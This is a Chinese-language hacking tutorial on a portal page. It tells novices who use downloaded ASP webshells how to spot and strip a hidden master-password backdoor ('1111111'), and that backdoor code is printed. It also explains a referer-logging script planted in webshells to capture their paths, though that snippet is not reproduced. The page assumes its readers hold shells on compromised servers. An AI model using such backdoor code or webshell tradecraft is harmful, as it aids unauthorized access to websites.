社会专题
靓丽女人 黑白社会 硬件网络 天下军事 教育咨询 星新一代 汽车电子 幽默笑话 农村特色 有书有道 软件技术 玄幻奇幻 办公达人 便民服务 免费资源 代码效果 美文园地 寻医问药 健康保健 时尚酷玩 天文地理 科技科幻 美食天下 游山玩水 历史天空 制作教程
FLASH频道
女生游戏 益智游戏 有声艺术 有声故事 电脑运用 休闲游戏 MTV类 运动游戏
聚划算
商旅游玩 装潢装饰 家电家具 服装服饰 健康保健 二手特色 生活必备 数码产品
映讯频道
喜剧片 国内片 情感片 动作片 战争片 纪录之窗 欧美剧集 明星云集 动漫片 港澳台剧 大陆剧 科幻片 恐怖片 浓缩电影 教育教学 艺术无界 一技之长 邻国热剧
下载中心
音体美合 信息社政 英语外语 科学自然 常用软件 语文数学 手机软件 红绿软件
图片中心
制作美图 生活图片 美女欣赏 实物图片 艺术欣赏 风景欣赏
领券购
热销女装 热血男装 生活必须 电子电器 手机电脑 旅游出行 学习艺术 吃货优选
新闻中心
一语惊人 奇闻趣事 热点专栏 曝光台 消费警示 今日观察 IT业界 消费主张 动态备忘 专利之窗
关闭
当前位置:首页社会专题硬件网络
简单判断是否有后门的方法

菜鸟们自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了, 难免有些居心不良的人会在里面加后门。

好不容易拿到个shell又被别人偷走了怎么甘心啊!所以在下完asp木马后要先检查有没后门,通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

IF requeSt.FoRM("pass")<>"" TheN

iF REquesT.foRM("pass")=uSERPASS Then

SEsSIoN("web2a2dmin")=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

IF requeSt.FoRM("pass")<>"" TheN

iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then

SEsSIoN("web2a2dmin")=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:

找到后删了,到此asp后门就算剔除了!

下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

以下是引用片段:

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址

简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

以下是引用片段:

插到asp木马中,那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解,大家千万别用来整菜鸟!

提示:输入修改代码都可运行!
1
酒精度
77
顶一下
相关阅读
内容加载中……